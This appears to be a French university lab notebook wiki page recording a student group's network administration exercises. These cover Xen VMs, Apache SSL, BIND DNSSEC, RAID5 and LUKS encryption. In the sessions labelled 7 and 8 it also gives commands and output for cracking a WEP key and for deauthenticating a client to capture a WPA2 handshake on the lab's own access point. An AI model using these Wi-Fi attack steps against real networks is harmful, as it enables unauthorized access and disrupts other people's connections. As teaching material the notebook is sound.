Cahier groupe n°9 : Différence entre versions
(→Séance 7 (9/11/2015)) |
(→Suivi de l'avancement du TP) |
||
Ligne 291 : | Ligne 291 : | ||
=== Semaine 8 === | === Semaine 8 === | ||
+ | ===== Cassage de mot de passe WPA-PSK par force brute ===== | ||
+ | * airodump-ng --encrypt wpa wlan0 | ||
+ | 04:DA:D2:9C:50:58 -49 33 0 0 12 54e. WPA2 CCMP PSK cracotte09 | ||
+ | * airmon-ng | ||
+ | |||
+ | * airodump-ng -w psk -c 12 --bssid 04:DA:D2:9C:50:58 wlan0 | ||
+ | CH 12 ][ Elapsed: 42 s ][ 2015-11-19 11:47 ][ WPA handshake: 04:DA:D2:9C:50:58 | ||
+ | |||
+ | BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID | ||
+ | |||
+ | 04:DA:D2:9C:50:58 -61 13 348 55 0 12 54e. WPA2 CCMP PSK cracotte09 | ||
+ | |||
+ | BSSID STATION PWR Rate Lost Frames Probe | ||
+ | |||
+ | 04:DA:D2:9C:50:58 24:77:03:24:8E:30 -67 54e- 1e 0 42 | ||
+ | |||
+ | * aireplay-ng -0 1 -a 04:DA:D2:9C:50:58 -c 24:77:03:24:8E:30 wlan0 | ||
+ | 11:58:39 Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:58) on channel 12 | ||
+ | 11:58:39 Sending 64 directed DeAuth. STMAC: [24:77:03:24:8E:30] [ 1|59 ACKs] |
Version du 19 novembre 2015 à 13:20
Sommaire
Cahier des charges de la tâche particulière
Présentation de la tâche particulière
Matériel utilisé pour la tâche particulière
Suivi de l'avancement du TP
Séance 1 (01/10/2015)
- Prise en main de l'eeePC
- Configuration du réseau
- Recherche de documentation de la clef DLNA
Séance 2 (08/10/2015)
- Mise en place d'un réseau Wifi pour le DLNA
- Test entre pc Windows et Meeboss ( OK )
- Test sur la télé SAMSUNG
- Mise a jour de l'OS de la clef MeeBoss
- Mise en place d'un serveur minidlna sur l'eeePC -> Il permet de diffuser du contenue en ligne Cependant il faut maintenant une télécommande pour dire qu'elle flux va sur qu'elle périf
Séance 3 (15/10/2015)
- installation de plusieurs logiciels pour communiquer avec la clé DLNA/Miracast sans succès
- création machine virtuelle :
xen-create-image --hostname=levrette --ip=193.48.57.169 --netmask=255.255.255.240 --gateway=193.48.57.174 --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd
- visualisation de l'installation
tail -f /var/log/xen-tools/levrette.log
- démarrage vm en mode console
xl console levrette
- installation des paquets SSH, apache2 et bind9
- commande nom de domaine
- création des clés :
openssl req -nodes -newkey rsa:2048 -sha256 -keyout levrette.key -out levrette.csr
- commande du certificat SSL
- démarrer la machine virtuelle :
xl create -c /etc/xen/levrette.cfg
- modification du fichier de configuration : ajout du bridge=IMA5sc et taille mémoire à 512
Séance 4 (20/10/2015)
- création des 2 partitions LVS :
lvcreate -L 10G -n /dev/virtual/ima5-levrette-home -v lvcreate -L 10G -n /dev/virtual/ima5-levrette-var -v
- ajout des partitions dans le fichier de configuration :
disk = [ 'file:/usr/local/xen/domains/levrette/disk.img,xvda2,w', 'file:/usr/local/xen/domains/levrette/swap.img,xvda1,w', 'phy:/dev/virtual/ima5-levrette-home,xvdc,w', 'phy:/dev/virtual/ima5-levrette-var,xvdb,w', ]
- Connexion Wifi:
- Connexion sur troubadour: ajout de l'adresse mac sur la borne Cisco ajout des paramètres dans etc/network/interfaces
- Connexion sur baguette: changement dans ifconfig du ssid ifconfig wlan0 hw ether 00:15:af:e7:19:f3
Séance 5 (26/10/2015)
- Activation module SSL pour Apache
a2enmod ssl
- Ecoute sur le port 443
<IfModule ssl_module> Listen 443 NameVirtualHost 193.48.57.169:443 </IfModule>
- Ajout du VirtualHost
NameVirtualHost *:443 <VirtualHost *:443> ServerName bonne.levrette.lol ServerAlias levrette.lol DocumentRoot /var/www/levrette/ CustomLog /var/log/apache2/secure_access.log combined SSLEngine on SSLCertificateFile /etc/ssl/certs/levrette.crt SSLCertificateKeyFile /etc/ssl/private/levrette.key SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem SSLVerifyClient None </VirtualHost>
- Mise en place du serveur DNS
- fichier de zone dans : /etc/bind/levrette.lol
$TTL 604800 @ IN SOA ns.levrette.lol. root.levrette.lol. ( 2015102211 ; Serial 86400 ; Refresh 3600 ; Retry 2419200 ; Expire 86400 ) ; Negative Cache TTL @ IN NS ns.levrette.lol. @ IN NS ns6.gandi.net. ns IN A 193.48.57.169 www IN A 193.48.57.169 bonne IN A 193.48.57.169 @ IN A 193.48.57.169 ns IN AAAA 2001:660:4401:60bb:216:3eff:fe26:724d www IN AAAA 2001:660:4401:60bb:216:3eff:fe26:724d bonne IN AAAA 2001:660:4401:60bb:216:3eff:fe26:724d @ IN AAAA 2001:660:4401:60bb:216:3eff:fe26:724d
- fichier de zone inverse : /ect/bind/57.48.193.in-addr.arpa
$TTL 604800 @ IN SOA ns.levrett/etc/bind/levrette.lole.lol. root.levrette.lol. ( 2015102001 ;serial 14400 ;refresh 3600 ;retry 604800 ;expire 10800 ;minimum ) 57.48.193.in-addr.arpa. IN NS ns.levrette.lol. 57.48.193.in-addr.arpa. IN NS ns6.gandi.net. 169 IN PTR levrette.lol.
- utilisation de ces zones dans le fichier principal :
zone "levrette.lol" IN { # Zone de type maître type master; # Fichier de zone file "/etc/bind/levrette.lol/db.levrette.lol"; }; zone "57.48.193.in-addr.arpa" IN { type master; file "/etc/bind/57.48.193.in-addr.arpa"; allow-transfer { 217.70.177.40; }; };
- génération des clés ZSK et KSK:
dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE levrette.lol dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE levrette.lol
- on déplace les clés dans le dossier : /etc/bind/levrette.lol.dnssec/
-rw-r--r-- 1 root bind 169 Oct 22 18:44 dsset-levrette.lol. -rw-r--r-- 1 root root 607 Oct 22 17:20 levrette-ksk.key -rw------- 1 root root 1774 Oct 22 17:20 levrette-ksk.private -rw-r--r-- 1 root root 433 Oct 22 17:21 levrette-zsk.key -rw------- 1 root root 1010 Oct 22 17:21 levrette-zsk.private
- ajout des clés dans le fichier : /etc/bind/levrette.lol
$include /etc/bind/levrette.lol.dnssec/levrette-ksk.key $include /etc/bind/levrette.lol.dnssec/levrette-zsk.key
- On fournit les clé à Gandi
- signature de la zone
dnssec-signzone -o levrette.lol -k levrette-ksk ../db.levrette.lol levrette-zsk
- modification dans le fichier named.conf.local, on renomme le fichier : db.levrette.lol en : db.levrette.lol.signed
Séance 6 (3/11/2015)
Séance 7 (9/11/2015)
5.2 Cassage de clef WEP d'un point d'accès Wifi
- airmon-ng start wlan0
- airodump-ng --encrypt wep wlan0
00:23:5E:1E:05:48 -46 30 0 0 7 54e. WEP WEP cracotte09
- airodump-ng -w out -c 7 --bssid 00:23:5E:1E:05:48 mon0
- aircrack-ng out-04.cap
Aircrack-ng 1.2 beta3 [00:00:00] Tested 851 keys (got 65535 IVs) KB depth byte(vote) 0 0/ 9 55(79616) 77(75520) 95(75264) 09(74752) 8C(74240) F3(73728) 17(73472) 1 0/ 1 2E(95232) CF(76800) 6E(76032) D0(75776) FE(75776) 2B(74752) F4(73984) 2 0/ 1 55(92672) 4F(80896) CE(79104) B2(75776) A4(75520) 7C(74496) CD(73984) 3 9/ 3 F7(73472) 34(72960) 3B(72960) 6A(72960) 07(72192) 27(72192) 43(72192) 4 0/ 4 A9(89088) 4C(75264) 7F(75264) 06(74240) 65(73728) 68(73472) 9E(73472) KEY FOUND! [ 55:55:55:55:55:55:55:55:51:11:11:11:11 ] Decrypted correctly: 100%
6.1 Sécurisation de données
- créations des trois partitions LVM de 1Go :
lvcreate -L 1G -n /dev/virtual/ima5-levrette-raidA -v lvcreate -L 1G -n /dev/virtual/ima5-levrette-raidB -v lvcreate -L 1G -n /dev/virtual/ima5-levrette-raidC -v
- ajout des partitions dans le fichier de configuration :
disk = [ 'file:/usr/local/xen/domains/levrette/disk.img,xvda2,w', 'file:/usr/local/xen/domains/levrette/swap.img,xvda1,w', 'phy:/dev/virtual/ima5-levrette-home,xvdc,w', 'phy:/dev/virtual/ima5-levrette-var,xvdb,w', 'phy:/dev/virtual/ima5-levrette-raidA,xvdd,w', 'phy:/dev/virtual/ima5-levrette-raidB,xvde,w', 'phy:/dev/virtual/ima5-levrette-raidC,xvdf,w', ]
- création du raid5 logiciel :
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf
- on s'arrange pour que le système charge le volume à chaque démarrage :
mdadm --monitor --daemonise /dev/md0
- grâce à un fdisk -l on retrouve le volume md0 qui vient d'être créer :
Disk /dev/md0: 2 GiB, 2145386496 bytes, 4190208 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 524288 bytes / 1048576 bytes
- on vérifie que l'on a bien créer notre raid5 avec la commande :
mdadm --detail /dev/md0
- on obtient :
/dev/md0: Version : 1.2 Creation Time : Mon Nov 9 16:08:23 2015 Raid Level : raid5 Array Size : 2095104 (2046.34 MiB 2145.39 MB) Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB) Raid Devices : 3 Total Devices : 3 Persistence : Superblock is persistent Update Time : Mon Nov 9 16:08:23 2015 State : clean Active Devices : 3 Working Devices : 3 Failed Devices : 0 Spare Devices : 0 Layout : left-symmetric Chunk Size : 512K Name : levrette:0 (local to host levrette) UUID : 0b73ee6c:7e92c6a4:3d5187c4:2ed0f75f Events : 0 Number Major Minor RaidDevice State 0 202 48 0 active sync /dev/xvdd 1 202 64 1 active sync /dev/xvde 2 202 80 2 active sync /dev/xvdf
on remarque que l'on a bien un raid 5, que trois volumes sont actifs et qu'il s'agit bien de nos trois partitions LVM xvdd, xvde, xvdf.
Après un reboot, on remarque que la VM a un problème avec le montage de md0. On remarque maintenant que le volume que l'on avait appelé md0 s'appelle maintenant md127. Afin de régler le problème au démarrage, au lieu de préciser le chemin, on précise UUID dans /etc/fstab :
UUID=bfc0b53b-d73a-495c-9fdc-a786a1804c5e /media/raid ext4 defaults 0 1
- Test du raid lorsque l'on ôte un disque :
on remarque que la VM démarre en mode urgence. Si on examine l'état du raid, on obtient :
/dev/md127: Version : 1.2 Raid Level : raid0 Total Devices : 2 Persistence : Superblock is persistent State : inactive Name : levrette:0 (local to host levrette) UUID : 0f3cbea1:27331f6c:ce16f3cd:404f5595 Events : 2 Number Major Minor RaidDevice - 202 48 - /dev/xvdd - 202 64 - /dev/xvde
- Grâce à cette commande (cat /proc/mdstat), il est également possible de voir que notre raid n'est pas fonctionnel mais il est juste inactif :
Personalities : md127 : inactive xvdd[0](S) xvde[1](S) 2095104 blocks super 1.2 unused devices: <none>
- On remonte le disque, puis on redémarre la VM. On se rend compte que le raid redémarre et est actif. Tout va bien.
6.2 Cryptage de données
Création du cryptage de la carte mémoire
cryptsetup luksFormat -c aes -h sha256 /dev/sda1
On peut vérifier qu'une clef existe bien a l'aide de la commande
cryptsetup luksDump /dev/sda1
Montage :
cryptsetup luksOpen /dev/sda1 levrette
Formatage pour la première utilisation :
mkfs.ext3 /dev/mapper/levrette mke2fs 1.42.12 (29-Aug-2014) En train de créer un système de fichiers avec 3971328 4k blocs et 993568 i-noeuds. UUID de système de fichiers=05607bf6-4a05-4ea9-a7e4-67f2fed01834 Superblocs de secours stockés sur les blocs : 32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208 Allocation des tables de groupe : complété Écriture des tables d'i-noeuds : complété Création du journal (32768 blocs) : complété Écriture des superblocs et de l'information de comptabilité du système de fichiers : complété
Montage de la partition :
mount -t ext3 /dev/mapper/levrette /mnt/
Il suffit ensuite de mettre ce que l'on souhaite sur la carte et ensuite de la démonter a l'aide des commandes suivantes :
umount /mnt cryptsetup luksClose levrette
Semaine 8
Cassage de mot de passe WPA-PSK par force brute
- airodump-ng --encrypt wpa wlan0
04:DA:D2:9C:50:58 -49 33 0 0 12 54e. WPA2 CCMP PSK cracotte09
- airmon-ng
- airodump-ng -w psk -c 12 --bssid 04:DA:D2:9C:50:58 wlan0
CH 12 ][ Elapsed: 42 s ][ 2015-11-19 11:47 ][ WPA handshake: 04:DA:D2:9C:50:58 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:9C:50:58 -61 13 348 55 0 12 54e. WPA2 CCMP PSK cracotte09 BSSID STATION PWR Rate Lost Frames Probe 04:DA:D2:9C:50:58 24:77:03:24:8E:30 -67 54e- 1e 0 42
- aireplay-ng -0 1 -a 04:DA:D2:9C:50:58 -c 24:77:03:24:8E:30 wlan0
11:58:39 Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:58) on channel 12 11:58:39 Sending 64 directed DeAuth. STMAC: [24:77:03:24:8E:30] [ 1|59 ACKs]